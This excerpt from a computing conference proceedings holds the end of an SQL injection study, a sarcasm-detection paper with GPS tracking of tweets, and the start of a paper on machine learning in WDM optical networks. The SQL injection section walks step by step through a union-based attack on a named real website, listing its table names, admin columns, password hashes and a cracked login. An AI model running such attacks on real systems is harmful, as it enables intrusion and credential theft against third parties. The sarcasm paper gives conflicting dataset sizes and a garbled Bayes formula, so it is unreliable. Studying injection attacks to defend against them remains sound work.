This user only could have some authenticity to execute the query and to grab data
from the server as outlined below:
grant execute on windy.* to examp@‘%‘

CREATE TABLE `salary_1` (


`empid` int(11) NOT NULL,
`sal` int(11) DEFAULT NULL,
PRIMARY KEY (`empid`)
) ENGINE=InnoDB DEFAULT
CHARSET=utf8;

Fig. 6 Creating table using stored procedure


A Comprehensive Study on SQL Injection Attacks … 625

DELIMITER $$

CREATE PROCEDURE `avg_sal`(out avg_sal decimal)


BEGIN
select avg(sal) into avg_sal from salary;
END

Fig. 7 Stored procedure

$database_connection = new
PDO('mysql:host=localhost;dbname=windy', 'examp',
'mypassword');
$queries = $database_connection->exec('call
avg_sal(@out)');
$resi = $queries->queries('select @out')->fetchAll();
print_r($resi);

Fig. 8 PDO to call stored procedure

The stored procedure is given in Fig. 7


In this process, by the above codes, avg_sal stored procedure has been created
and this will be going to save in the data server for future calling [10, 11]. We have to
use PDO to call a stored procedure from the application of PHP as shown in Fig. 8.
As per the request by the user, the $resi will give the average salary. After this, a
user may bring out output with PHP methods. In the data-base security process, it is
essential to connect the user and the table to know its information, which is essential
for the user of which user have no direct access that can be done by Stored procedure
only.

3.4 Escaping

In this kind of prevention function, every time we have to do some work with char-
acter escaping method for customer provided input by DBMS. In this technique, the
SQL query which is given by the developer will not confuse the statement. Here,
we have used mysqli_real_escape_string() in PHP. Unintended SQL functions are
being provided. Here, we have provided a different way to bypass the login field
authentication [7] as shown in Fig. 9.
626 S. Dasmohapatra and S. B. B. Priyadarshini

$database_connection = mysqli_connect("localhost", "user", "password","db"); $username =


mysqli_real_escape_string($database_connection,$_POST['username']);
$password = mysqli_real_escape_string($database_connection,$_POST['password']);
$queries = "SELECT * FROM users WHERE username = '" . $username."' AND password =
'". $password. "'";

Fig. 9 Bypassing loging field authentication

Above code will be vulnerable by entering some character like ‘\’ which is called
as escaping character in front of a single quote. By this technique, we can prevent
SQLIA by having few alterations.

3.5 Avoiding Administrative Privileges

Root access devices can’t be validating any account of the database. It is wanted to
be carried out if truly wished, given that the attackers ought to reap to get admission
to total server [11]. Due to this idea, it is best to put into effect the least advantage
for data server to protect the software program in opposition to SQL injection [9].

3.6 Firewall Applications

This is the best prevention technique to avoid SQLIA. It is also called as web appli-
cation firewall (WAF) [12]. By the firewall technique, the database identifies threats
or malicious inputs by the user, which are being monitored. Basically, it is a check
point within internet and web functions for authentic login. Web application firewall
helps to secure the website by well-defined rules of safety guidelines. These kinds of
guidelines are different for every web application according to its need for security.
The policies of WAF inform the weakness of website and web security to the firewall
by searching procedures. After getting this information, WAF gets help to monitor
the users and their requests to find the malicious inputs and to block them [11, 12].
Web firewalls help to protect different malicious functions and security threats. Some
of them are cross-site scripting, poisoning of cookies, session hijacking, SQLIA, etc.
Moreover, web firewall also gives these benefits written over here.
• It automatically protects basic unknown and known malicious injection attacks.
• It also monitors HTTP and helps the web application for real-time safety when
the attacker is logging in or trying to get into the data server as unauthentic.
Finally, to avoid the malicious attack a developer should know about all kinds of
attacks and it’s prevention techniques for overcoming the security threats [11].
A Comprehensive Study on SQL Injection Attacks … 627

4 Example of Union-Based SQL Injection

Website name: http://www.tncgroup.pk/


=============================
google dork used to find vulnerable file and parameters: inurl:.php?id = site: http://
www.tncgroup.pk/
vulnerable link to proceed: http://tncgroup.pk/content.php?Id=2

4.1 Step 1. Finding the Error

* http://tncgroup.pk/content.php?Id=-2’ – putting a single quote after the parameter


to check if error occurs if yes, the proceed.
!!!!! error occurs!!!!!

4.2 Step 2. Finding the Total Number of Columns

*Command used: order by n- (where n should start from 1 until another error occurs).
-----------------
Implementation.
-----------------
* http://tncgroup.pk/content.php?Id=2 order by n- (where n should startfrom1 until
another error occurs).
* http://tncgroup.pk/content.php?Id=2 order by 1-
* http://tncgroup.pk/content.php?Id=2 order by 2-
* http://tncgroup.pk/content.php?Id=2 order by 3-
*
*
*
* http://tncgroup.pk/content.php?Id=2 order by 14-
!!!!! Error occurs!!!!!
628 S. Dasmohapatra and S. B. B. Priyadarshini

--- (Error occurs at 14).


--- That means (14 - 1 = 13), so there are total 13 number of columns in the database.

4.3 Step 3. Finding the Vulnerable Column from the Total


Number of Column

Now we must find the vulnerable columns from the total 13 number of columns.
Command used: union select 1,2,3,4,5,6,7,8,9,10,11,13 --+
---------------------------------------------------------------------------
Implementation:http://tncgroup.pk/content.php?Id=-2 union select
1,2,3,4,5,6,7,8,9,10,11,12,13 --+
----------------------------------------------
* -(minus) is used before the parameter to bypass the Web application firewall (WAF).
Output:
We are getting the column 2 and 3, Where 2 is a bold than 3 , than means we will
proceed on 2.
Note:
-- write the function names in place of the vulnerable columns.
* to get the database name - database ()
* to get the version name - version ()
* to get the username - user ()

Example: http://tncgroup.pk/content.php?Id=-2 union select 1, database


(),3,4,5,6,7,8,9,10,11,12,13 - +
http://tncgroup.pk/content.php?Id=-2 union select 1, version
(),3,4,5,6,7,8,9,10,11,12,13 --+
http://tncgroup.pk/content.php?Id=-2 union select 1, user
(),3,4,5,6,7,8,9,10,11,12,13 --+

4.4 Step 4. Finding the Table Names Under the Database

Now we must find the table names under the database.


Command used:
(a) group_concat(table_name)
A Comprehensive Study on SQL Injection Attacks … 629

(b) from information_Schema.tables where table_schema=database ()


*command no.1 should be written in the place of vulnerable column we found, and
the command no.2 should be written after 13 that is the total numberof column.
Implementation:
-------------------------
http://tncgroup.pk/content.php?Id=-2 union select 1,
group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from informa-
tion_Schema.tables where table_schema=database() --+
After executing the above command, we got out put as:
-----------------------------------------------------
TBL_ADDRESS_BOOK,TBL_ADMIN,TBL_AMOUNT_STATUS,TBL_
BANNERS,TBL_BRANDS,TBL_CART,TBL_CAT,TBL_
COLORS,TBL_COLORS_IMG,TBL_COMPAIN,
TBL_CONTENTS,TBL_COUNTRY,TBL_COUPON,TBL_
CURRENCY,TBL_DESIGN_DETAIL,TBL_FAQS,TBL_FEEDBACK,TBL_
GROUP,TBL_INQ,TBL_INQ_DETAIL,TBL_INQ_STATUS,
TBL_INQUIRY,TBL_INQUIRY_DETAIL,TBL_LETTER,TBL_LOGOS,TBL_
LOGS,TBL_MAIL_GROUP,TBL_MAIN,TBL_MEMBERS,TBL_
MORE,TBL_NEWS,TBL_NEWSLETTER,
TBL_OPT_VALUES,TBL_OPTIONS,TBL_
ORDER_CUSTOMER,TBL_ORDER_ITEMS,TBL_ORDER_
STATUS,TBL_ORDERS,TBL_PAY_STATUS,TBL_PIC_CATEGORY,
TBL_PICTURES,TBL_PROD_OPT,TBL_PROD_SALE,TBL_PRODS,TBL_
RELATED,TBL_REVIEW,TBL_SCHOOLS,TBL_SECTION,TBL_
SHIP_METHODS,
TBL_STATES,TBL_STATS,TBL_SUB_OPT,TBL_SUBSCRIBERS,TBL_
TAX,TBL_WEBS,TBL_WISHLIST,TBL_ZONE
* We got a table name as: - TBL_ADMIN, which may contain the username and
password.
Now we must find the column names of the target table.

4.5 Step 5. Finding the Column Name from the Target Table
Command Used

group_concat(column_name)
630 S. Dasmohapatra and S. B. B. Priyadarshini

from information_Schema.columns where table_name = (put here the hex value of


the table name begining with 0x, that is TBL_ADMIN [try both upper case and lower
case]) - +
*** To Convert the table name into the hex value: www.online-toolz.com
Implementation
---------------------
http://tncgroup.pk/content.php?Id=-2 union select 1,
group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13 from informa-
tion_Schema.columns where
table_name=0x74626c5f61646d696e --+
Note:
-------
hex value of tbl_admin : 74626c5f61646d696e (converted using online-toolz.com)
Output:
--------
we get the column names as: MAINID,PNAME,PLOGIN,PPASS,PSHOW
* Now we have to get the data from the columns. may be from PLOGIN and PPASS
as this seems to be login and password.

4.6 Step 6. Getting the Data from the Columns

-
Command Used
---------------------
group_concat(plogin,0 × 3a,ppass).. //0 × 3a is used in between the column names
with coma(,) to distinguish the username and password.
from tbl_admin – +
* command 1 is used in place of vulnerable column we found and 2 is used at the
last that is after 13, which is the total no. of columns
Output.
----------
21232F297A57A5A743894A0E4A801FC3:
A Comprehensive Study on SQL Injection Attacks … 631

202CB962AC59075B964B07152D234B70
may be admin/123
to encrypt / decrypt: hashkiller.co.uk.

5 Conclusion

Structure Query Language Injection Attack technique is used for stealing data from
a web server. In this paper, we have learned about the types of the SQL attack, their
techniques, prevention and their methodologies. Here, we have observed that in every
web application there is a back end. In the back end, there is data server/ database.
If an attacker can bypass the authentication process and gets into the database and
can be able to see and grab the information from the database illegally then it will
be called as injection method. The SQLIA technique can be performed by a user
by bypassing login page by entering some malicious SQL codes or clauses to it.
To prevent such kind of attack, the developers should have some basic knowledge
about these techniques to prevent them. In the future, we will try to extract some new
prevention methods to secure our database by these types of attackers. Also, we have
to make some more research about the web firewalls to protect the web application.
Although various strategies have been developed to counter SQL injection attack,
still then more sophisticated fault tolerant and reliable algorithm can be developed
for providing better security to the system.

References

1. Shema, M. (2010). Seven Deadliest Web Application Attacks. Elsevier Inc., (pp. 47–69).
2. Halfond, W. G. J. & Orso, A. (2006). Preventing SQL injection attacks using Amnesia. In
Presented at the Proceedings of the 28th international conference on Software engineering
(ICSE), ACM, Shanghai, China, (vol. 11, pp. 795–798), May 20–28, (2006).
3. Alazab, A., & Khresiat, A. (2016) New strategy for mitigating of SQL injection attack.
International Journal of Computer Applications (IJCA), 154, 11.
4. Halfond, W. G., & Orso. A. (2005). Analysis and monitoring for neutralizing SQL-injection
attacks. In Proceedings of the 20th IEEE/ACM International Conference on Automated
Software Engineering.
5. Som, S., Sinha, S. & Kataria, R. (2016) Studyon SQL injection attacks mode, detection and
prevention. International Journal of Engineering Applied Sciences and Technology(IJEAST),
1(8), 212–220.
6. Dornseif, M. (2005). Common failures in internet applications. http://md.hudora.de/presentat
ions/2005-common-failures/dornseif-common-failures-(2005-05-5).pdf.
7. Patel, N. (2015) Implementation of pattern matching algorithm to defend SQLIA/International
Conference on Advanced Computing Technologies and Applications (ICACTA- 2015) /
Procedia Computer Science 45, pp. 444–450, ( 2015 ) https://www.ptsecurity.com/ww-en/
analytics/knowledge-base/how-to-prevent-sql-injection-attacks/.
8. Andreu, A. (2006). Professional Pen Testing for Web Applications. Wrox, 2, 113–120.
632 S. Dasmohapatra and S. B. B. Priyadarshini

9. Chris, A. (2010). Advanced SQL injection in SQL server applications, vol. 9, p. 2. http://www.
nextgenss.com/papers/advanced_sql_injection.pdf (2002).
10. Stephen, J. F. (2005). SQL Injection attacks by example, vol. 3, pp. 3–5
11. Elmasri, R., & Navathe, S. B. (2011). Fundamentals of database systems (6th ed.). United
States of America: Addison-Wesley.
12. Nithya, V., Regan, R, & Vijayaraghavan, J. (2013). A survey on SQL injection attacks, their
detection and prevention techniques. International Journal Of Engineering And Computer
Science (IJECS), 2(4), 886–905.
13. Limei, M., et al. (2019). Research on SQL injection attack and prevention technology based on
web. In International Conference on Computer Network, Electronic and Automation (pp. 176–
179).
14. Su, G., et al. (2018) Research on SQL injection vulnerability attack model. In 5th IEEE
International Conference on Cloud Computing and Intelligence System (pp. 217–221).
Sentimental Analysis on Sarcasm
Detection with GPS Tracking

Mudita Sharan and M. Ravinder

Abstract Sentimental analysis which is also known as opinion mining is one of the
major tasks of natural language processing (NLP). Sentimental analysis is a technique
which is used to identify a person’s sentiment, humor and their emotion. Sarcastic
comments imply what a person wants to say in a conflicting manner. Sarcasm is being
generally used among numerous informal communication and smaller scale blogging
sites where individuals attack others which makes tricky for the person to state what
it implies. For example, many sarcastic tweets which gives a positive impact like,
“Technical talk right after lunch” but it describes an undesirable activity. There are
number of researches done in sarcasm. In this paper feature extraction techniques
were used, for instance, logistic regression, support vector machine (SVM), random
forest, etc. to recognize sarcasm in tweets from the twitter gliding API. The perfect
classifier is picked then joined along different pre-handling, separating methods
utilizing sarcastic and non-sarcastic lexicon mapping to give the most ideal precision.
A GPS tracking system is used collect the data and allocate to which location the
Tweets are coming from. The sarcastic and non-sarcastic word reference being the
shrewd idea introduced in this paper.

Keywords Sarcasm detection · Sentiment analysis · Humor · Support vector


machine · Natural language processing

M. Sharan (B)
Computer Science and Engineering Department, Institute of Engineering and Technology,
Lucknow, India
e-mail: Msharan.csed.cf@ietlucknow.ac.in
M. Ravinder
Computer Science and Engineering Department, Indira Gandhi Delhi Technical University For
Women, Delhi, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 633
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_51
634 M. Sharan and M. Ravinder

1 Introduction

As of late social networking sections like Twitter, Instagram and Amazon have
obtained broad ubiquity along with its significance. Twitter be one of many biggest
sociable stage where individuals expressed their suppositions, emotions, perspectives
also continuous occasions, for example, live tweets and many others. Twitter permits
the clients to enlist the messages send and afterward peruse reply which are termed
as tweets. Sarcasm is a particular difficulty looked in sentimental analysis. Twitter
additionally empowers various clients to be able to communicate their thoughts along
with conclusions, another which empower many organizations to know how popular
assessment on their items or administrations can give the continuous client help.
Sarcasm is communicating pessimistic sentiments utilizing decisive words. Sarcasm
be likewise at the same time individual wants to determine something different from
what they talk. Sarcasm is utilized not exclusively for mockery yet in addition as
reprimanding others, aspect, thoughts and so forth because of which sarcasm is a
lot of utilized on Twitter. Sarcasm can be passed on in different manners like an
immediate discussion, speech, text and so on. It tends to be imitated utilizing ratings
by giving fewer number of stars.
Organizations continuously tap into social media trying to understand opinion of
customer around product, services and giving real time customer support. From a
research perspective, the various problem there are in natural language processing
(NLP), some problems are easy, and some problems are hard. It is widely believed
things like questions and answers, summarization in translation belongs to the cate-
gory of hard problems and sarcasm detection is one more addition to this. It is a
deliberate play on the part of the person, so the person plays with the language and
nuisances of the language to be able to communicate something sarcastically. Hence,
it is subtle in nature. It will be just a play of language, where a word is here or there
or a punctuation or a phrase.
A GPS tracking system is used in such a way that once it is detected that the
comment is sarcastic then GPS tracking is done, where the mechanism that it uses
is the global positioning system (GPS) for tracing any mobile or systems journey,
whereas determining their accurate location. The recording of the location data can be
stored in tracking device or can be transferred to an internet connected gadget using
the radio or the satellite modem already ingrained in the gadget unit. Aforementioned
will tell from where more sarcastic comments are coming so that they can be fixed,
like comments on politics, racism, etc. Therefore, to consolidate the aptitudes with
Twitter’s geolocation information and simple to-utilize usefulness of geo commons
to make an interactive map of the racist tweets.
The contents of the paper are divided into different sections. Section 3 talks about
the previous work done in sentimental analysis on sarcasm detection. Table 1 shows
different sentimental analysis on Sarcasm detection. Section 9 shows experimental
results and finally the paper is concluded in Sect. 10.
Table 1 Different sentimental analysis on sentimental analysis on sarcasm detection
S. No. Topic Author name Methodology Task Dataset Classification used
1 Sentiment analysis for Prasad et al. [1] POS training, POS To discover the Online review sites, The PBLGA algorithm
sarcasm detection on testing, PBLGA exactness of proposed media sites and other utilized 1.45 million
streaming short text testing model microblogging sites tweets as its test data
data
2 Sarcastic detection of Bharti et al. [5] POS training, POS To discover the Online review sites, The PBLGA algorithm
tweets streamed in real testing, PBLGA exactness of the media sites and other utilized 1.45 million
time testing proposed model microblogging sites tweets as its test data
3 Sarcasm detection in Kaushik and Barot [6] Support vector Identifying Sarcasm Sarcasm labeled Bag-Of-Words
sentiment analysis machine (SVM), corpus and features
logistic regression based on punctuations
such as ‘!’ and ‘?’
4 A comprehensive study Sindhu et al. [7] Data collection. Data Relating comments Twitter and Amazon Emoticons, punctuation
on Sarcasm detection pre-processing, with tag marks, quotation marks
techniques in polarity detection
sentiment analysis
5 Detection of sarcasm Mehndritta et al. [8] Data pre-processing To identify a superior Twitter Streaming API Word Tokenization,
in text data using deep and data preparation classifier among the POS tagging,
Sentimental Analysis on Sarcasm Detection with GPS Tracking

convutional neural utilized stemming,


networks lemmatization
6 Recognition of Tungthamthiti et al. [9] Contradiction in To find a superior News article dataset Pragmatic
sarcasm in tweets sentiment score classifier
based on concept level
sentiment analysis and
Supervised learning
approaches
7 Sarcasm detection: a Bhattacharyya [10] Data set, classifiers Discover feature that Original bilingual Lexical
computational and gives a superior result corpus
cognitive study
635
636 M. Sharan and M. Ravinder

2 Literature Review

Prasad et al. [1] suggested a system to identify sarcastic and non-sarcastic tweets
dependent on the lingo and emoticons utilized in tweets. Their main concern was
on the quality of lingo and emoticons word reference. At that point these qualities
are contrasted and diverse arrangement calculations like random forest, gradient
boosting,
Log R adaptive boost, Gaussian Naïve Bayes to distinguish the sarcastic tweets
from the Twitter Streaming API. The best arrangement calculation is thought of and
joined along various pre-processing and separating strategies utilizing emoticon and
slang word reference planning to provide best proficiency.
Parveen and Deshmukh [2] the authors proposed an algorithm to distinguish the
sarcastic comments on twitter utilizing simple vector machine (SVM), maximum
entropy algorithms. At first, authors divided their work as in to two datasets which
were afore adding the sarcastic tweets in the instruction data and the other was
later adding the sarcasm to the instruction data. Tagging was done utilizing Penn
tree bank to even every word with its related linguistic form. The creators separated
highlights identified with sentiment, punctuation, syntactic and design and so on with
the help of information data. After separating highlights, arrangement is finished by
utilizing SVM, and maximum entropy calculations. Contrasted with these calcula-
tions, maximum entropy gives higher precision when contrasted with support vector
machine formula.
Jain et al. [3] suggested a system using the random forest algorithm along with
weighted ensemble algorithms for identifying the sarcastic tweets with the help
of a pragmatic classifier for the detection of emotion-based sarcasm. Bestow the
author wants to tell that sarcasm is nothing, but the combination of positive as well
as attachment to a negative sentiment or adhere with a pessimistic circumstances.
Definitiveness as well as accurateness is examined for the calculation of adequacy
in random forest classifier and weighted ensemble algorithms, whereas the two gave
the same accuracy when compared in the end.
Manohar and Kulkarni [4] the creators proposed another methodology for sarcasm
recognition as NLP and Corpus-based methodology. Author’s goal was to understand
that why a client is willing to use a sarcastic comment instead of just writing an honest
feedback. Authors gathered the tweets from the Twitter site, whereas implemented
the NLP methods like tokenization, grammatical features (PoS) and lemmatization.
NLP procedures on tweets were tested to retrieve activity words. While getting the
activity words which were retrieved from the tweets, words are coordinated with the
collection of sarcasm information utilizing semantic coordinating and diagram based
coordinating, while giving an average of sarcasm considering the tweets data. With
this average, the severity of sarcasm considering the tweets data were analyzed.
Sentimental Analysis on Sarcasm Detection with GPS Tracking 637

3 Related Researches

With progresses in data mining and substance mining figuring’s joined with the
colossal number of substance data being made each day, on a wide scope of electronic
life organizes in this twitter. The probability of governments trying to inspect ends
and presumptions is a lot of possible this time than at some other time. Table 1,
shows the different sentimental analysis of sarcasm detection with their task, dataset,
classification and methodology.

4 Methodologies of Sarcasm Detection

The fundamental methodologies of sarcasm detection can be stated as the following:


• ML approach
In the machine learning approach, ML is a subset of AI. It provides us statistical
tools to explore the data and to understand about that particular data. We have three
approaches, first is supervised machine learning, second is unsupervised learning
and third is reinforcement learning. In case of supervised, we will have a labeled
data or some past data through which we can do prediction that tweets are sarcastic
or non-sarcastic. Varies in unsupervised learning we solve the clustering kind of
problems. And lastly in reinforcement learning some part of the data will be labeled
and some part of the data will not be labeled. ML procedures like Naïve Bayes (NB),
maximum entropy (ME) and support vector machines (SVM) have made incredible
progress in text classification.
• Lexicon based methodology
The idea is we use some manual define rules to classify whether the review is
positive or negative. In Lexicon based methodology, we count for each comment
that how many positive or negative words are there. Then, we calculate a score
that how much % of comment are sarcastic and how much % is for non-sarcastic
comments.
• Deep Learning
Here, we want to train a network to make predictions. Starting point is the same
as in ML based approach, as we need a labeled data set but pre-processing is a bit
different, here in this deep learning we say a text is time serious. But to train a
network first we have to bring all the documents in same shape of the numerical data
representation. So that we can always have shape for each sample and therefore we
firstly encode each word with a number and then we see that each document has
some number of words in them.
638 M. Sharan and M. Ravinder

5 Proposed Architecture

The proposed Architecture follows the means as given beneath:


i. Foremost step here is the gathering of the data so that the methodology can be
applied as divided the data into the practice test and experiment test. Since we
are using a machine learning approach in which we have some labeled data
so that whichever classifier we apply can take the labeled data and apply its
experimentation. The twitter API was used to collect the dataset.
ii. In the next step, the labeled data that we have got from the Twitter API it is
pre-processed so that unnecessary words can be expelled that are not needed.
Here the pre-processing is done so that information like URLs, tagging,
emoticons can be removed from the data (Fig. 1).
iii. After achieving the pre-processed words of tweets, the visage that will be
required, while performing the classification techniques are extracted. There
are mainly three kinds of visage that we have which are Pragmatic, N-gram
and Hyperbolic. We will be using here N-gram visage for the extraction.
iv. The obtained visage or features are then given to the classifier, the four
classifiers take the features are starts processing in the practice set.
v. Heretofore the classifier has starting processing on the practice data, now with
the features are provided for the experiment set through which it is not visible
to the classifier that we used.
vi. Concluding the outcomes are captured of the practice data set and the experi-
ment data set. The plotting of the tweets is done showing the area from which
the sarcastic tweets are more.

Fig. 1 Proposed methodology


Sentimental Analysis on Sarcasm Detection with GPS Tracking 639

6 Sarcasm Detection Algorithm

STEP 1: Collected datasets of 33,000 tweets.


STEP 2: Pre-process the data.
STEP 3: Filtered emoticons, hashtags.
STEP 4: Stemming the remaining words.
STEP 5: Data feature engineered.
STEP 6: Unigrams.
STEP 7: Applied SVM classifier.
STEP 8: Applied Naïve Bayes Classifier.
STEP 9: Applied Decision Tree Classifier.
STEP 10: Tracking the location through a GPS locator.
STEP 11: Observing result with Received Operating curves.

The tweets were accumulated which were 16,000 sarcastic tweets and 16,000
non-sarcastic tweets for testing sarcasm in Sentimental analysis.

7 Evaluation

A. Verification input
Information being used in the experiment was taken through twitter with an
official email. The total information data that we gathered were 27,000 in which
we distributed 13,000 as sarcastic tweets and 14,000 as real tweets. In this, we
took 65% as our practice data and 35% as experimentation data.
B. Assessment outcomes

The datasets [11] were assessed by taking in light of the classifiers used. The clas-
sifiers that we will be using here are support vector classification, logistic regression,
Naïve Bayes classification and decision tree.
Classification. For assessing our conclusion, we are using a standard heuristic
which are the territory under the bend (AOC) for a collector working trademark and
(ROC) bend for all arrangements.
(1) Support Vector Classification
We are using SVM for separating our data into two parts, i.e., positive comments
and negative comments with a hyperplane, it will create two margin lines which will
have some distance so it will be easily separable for both the classification points.
Given a set of training experiment each marked as belonging to one or the other
two categories which were sarcastic and non-sarcastic tweets.
Support vector machine training algorithm build a model that designs new
experiment to one category or another dividing it into two different parts (Fig. 2).
640 M. Sharan and M. Ravinder

Fig. 2 SVM ROC

(2) Logistic Regression


We are using it for binary classification. According to tweets, we are categorizing
sarcasm into sarcastic and non-sarcastic.
If the bag-of-words weight are more than 75% it becomes a sarcastic comment,
if it less than 75 it becomes a non-sarcastic comment (Fig. 3).
(3) Naïve Bayes Classification
In this, we are implementing conditional property in which two events are taken
as sarcastic tweets as A and non-sarcastic tweets as B. Two cases arises as first
probability of event A given that B has already occurred. And second probability of
event B given that A has already occurred. The formula 1 used:
   
A P BA + P(A)
P = (1)
B P(B)

Fig. 3 Logistic regression


ROC
Sentimental Analysis on Sarcasm Detection with GPS Tracking 641

(4) Decision Tree Classification

We are creating a decision tree with the datasets that we have collected. The target
attributes here will be negative comments (Figs. 4 and 5).
We have analyzed sarcastic and non-sarcastic tweets and utilize ROC bend for
every classifier.
(5) GPS Tracking
The guide utilizes an area remainder which, “demonstrates each a lot of political
race hate speech tweet comparative with its all-out number of tweets.”
Seven turned gray out states has no racist tweets. Strangely, the greater part of
those seven appear to be states that have lower Twitter use than the rest.

Fig. 4 Naïve bayes ROC

Fig. 5 Decision tree ROC


642 M. Sharan and M. Ravinder

Fig. 6 Mapping racist tweets

Six of the dark states (Alaska, Idaho, S. Dakota, Wyoming, Montana and Hawaii)
had an exceptionally low number of tweets in general—albeit one (Rhode Island)
had a noteworthy number of tweets (Fig. 6).

8 Testing Method

In the testing phase, we formed the gain which tells the total outcome, so if any one
algorithm the tweets occurs as sarcastic comments then we do not need to check the
other algorithms, they will automatically announce that tweet is a sarcastic tweet
saving time and efficiency. After getting the sarcastic tweets, finally the plotting
is done through the GPS tracking system which will show the area prone to more
sarcastic tweets.

9 Results

Current Current Existing Existing


Algorithm SVM LogR SVM LogR
Accuracy 0.6876 0.66677 0.655 0.610
Precision 0.8677 0.92877 Unavailable Unavailable
Sentimental Analysis on Sarcasm Detection with GPS Tracking 643

10 Conclusion and Future Scope

Sentimental analysis in sarcasm detection in social media shows how current person’s
opinion is about in any real time event or trends. In this paper, different algorithms
were compared and the classifier which gave the best outcome is the support vector
machine. The tweets with sarcastic comments were then processed in GPS locator
which tells us the exact area from where the sarcastic comments were the most.
In future, we can find the sarcastic comments of tweets which uses hashtags and
emoticons. Emoticons are generally used in the comment box to portray the emotions
of a person, but to know whether it is a positive or a negative comment it is a strenuous
task.

References

1. Prasad, A. G., Sanjana, S., Bhat, S. M., & Harish, B. S. (2017). Sentiment analysis for
sarcasm detection on streaming short text data. In 2nd International Conference on Knowledge
Engineering and Applications. IEEE.
2. Parveen, S., & Deshmukh, S. N. (2017). Opinion mining in twitter-sarcasm detection.
International Research Journal of Engineering and Technology (IRJET), 04(10), 201–204.
3. Jain, T., Agrwal, N., Goyal, G., & Agarwal, N. (2017). Sarcasm detection of tweets: a
comparitive study. In Tenth International Conference on Contemporary Computing (IC3).
IEEE.
4. Manohar, M. Y., & Kulkarni, P. (2017). Improvement sarcasm analysis using NLP and corpus
based approach. In International Conference on Intelligence Computing and Control Systems
(ICICCS). IEEE.
5. Bharti, S. K., Vachha, B., & Pradhan, R. (2016). K babu and S Jena. Sarcastic Sentiment
Detection in tweets streamed in real time: A Big data approach, Digital Communications and
Networks, 2(3), 108–121.
6. Kaushik, S., & Barot, M. P. (2016). Sarcasm detection in sentiment analysis. IJARIIE, 2(6).
ISSN(O)-2395-4396.
7. Sindhu C, G Vadiyu Mandala, Vishal Rao, A comprehensive study on Sarcam detection
techniques in sentiment analysis” Research gate, June 2018
8. Mehndiratta, P., Sachdeva, S., Soni, D. (2017). Detection of sarcasm in text data using deep
convolutional neural networks. Scalable Computing: Practice and Experience, 18(3).
9. Tungthamthiti, P., Shirai, K., & Mohd, M. (2017). Recognition of sarcasm in tweets based
on concept level sentiment analysis and supervised learning approaches. In 28th Pacific Asia
Conference on Language, Information and Computational (pp. 403–413).
10. Bhattacharyya, P. (2018). Sarcasm detection: A Computational and Cognitive study. CSE dept,
IIT Bombay and IIT Patna, Jan 2018.
11. www.internetlivestats.com/twitter_statistics/.
12. https://www.analyticsvidhya.com/blog/2017/09/naive-bayes-explained/.
13. Buscaldi, D., Rosso, P., & Reyes, A. (2013). From humour recognition to irony detection: The
figurative language of social media. Data & Knowledge Engineering April 2013
14. Barbieri, F., & Saggion, H. (2014). Automatic detection of irony and humour in twitter. In
Proceedings of the student Research Workshop at the 14th Conference of the European Chapter
of the association for Computational Linguistics (pp. 56–64). Gothenburg, Sweden.
15. Bifet, A., & Frank, E. (2015). Sentiment knowledge discovery in twitter streaming data. In
Discovery Science (pp. 1–5).
644 M. Sharan and M. Ravinder

16. Forslid, E., & Wiken, N. (2015) Automatic irony-and sarcasm detection in social media.
ISSN:1401-5757 uptec f15 045.
17. Bamman, D., & Smith, N. A. (2016). Contextualized sarcasm detection on twitter. School of
Computer Science, Carnegie Mellon University
18. Joshi, A., Sharma, V., & Bhattacharyya, P. (2016). Harnessing context incongruity for sarcasm
detection. Res Gate 69–53.
19. Bindra, K. K., et al. (2016). Tweet Sarcasm: Mechanism of sarcasm detection in twitter.
International Journal Of Computer Science and Information Technologies (IJSCSIT), 7(1).
20. Mukherjee, S., & Bala, P. K. (2017). Detecting sarcasm in customer tweets : An NLP based
approach. Industrial Management & Data Systems, 117(6), 1109–1126.
21. Sreelakshmi, K., & Rafeeque, P. C. (2018). An effective approach for detection of sarcasm in
tweets. In International CET Conderence on Control, Communication and Computing (IC4)
(pp 337–382), IEEE, July 05–07.
22. Arora, M., & Kansal, V. (2019). Character level embedding with convolution neural network
for text normalization of unstructured data for twitter sentiment. Social Network Analysis and
Mining, 9(1), https://doi.org/10.1007/S13278-019-0557-Y, 2019.
Impact of Machine Learning Algorithms
on WDM High-Speed Optical Networks

Saloni Rai and Amit Kumar Garg

Abstract This paper focuses on comparing the various machine learning (ML) algo-
rithms that can be applicable in wavelength division multiplexing (WDM) optical
networks to provide better simulation outcomes. ML, combined with WDM optical
networks, helps in network control and resource management that are useful in
service provisioning and resource assignment. This paper gives a comprehensive
review of machine learning approaches in WDM optical networks concerning support
vector machine (SVM), K-nearest neighbour (K-NN), decision tree, random forest
and neural networks algorithms. These algorithms’ performances are compared in
terms of accuracy and AUC; further, the accuracy and AUC results show an average
outcome of 99% and 0.98, respectively. Simulation can be performed on MATLAB
and Net2plan tools using different data sets in terms of average accuracy and AUC for
WDM optical networks. This research’s future directions can be towards ML utiliza-
tion to provide optimal routing and wavelength assignment, increasing bandwidth
utilization to reduce control overheads, reduce computational complexity, security,
fault occurrence and monitoring schemes for WDM optical networks supporting 5G
applications.

Keywords Optical networks · Wavelength division multiplexing · Machine


learning · Quality of transmission · 5G

1 Introduction

Machine learning is a technology that provides the system with the capability of
learning and improving automatically from experiences. The computer programs
are designed through machine learning in such a way that the data can be accessed
and learned on their own. It is a branch of artificial intelligence that is gaining huge
popularity in today’s technology [1]. The machines can execute the intellectual tasks
that were traditionally solved by humans through machine learning technology that

S. Rai (B) · A. K. Garg


Electronics and Communications Department, D.C.R.U.S.T, Murthal, Haryana, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 645
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_52
646 S. Rai and A. K. Garg

provides complex mathematical and statistical tools. In all the networking fields, the
idea of automating complex tasks has been of great interest since the machines can
be given the tasks of designing and operating communication networks [2]. Also,
the implementation of deep learning algorithms, especially convolutional neural
networks (CNN), brings huge benefits to the medical field, where a huge number
of images are to be processed and analysed [3]. This paper focuses on reviewing
the applications of ML in optical networking-based technologies. Supervised and
unsupervised are the two commonly known types of machine learning algorithms.
A hybrid of supervised learning and unsupervised learning is introduced as semi-
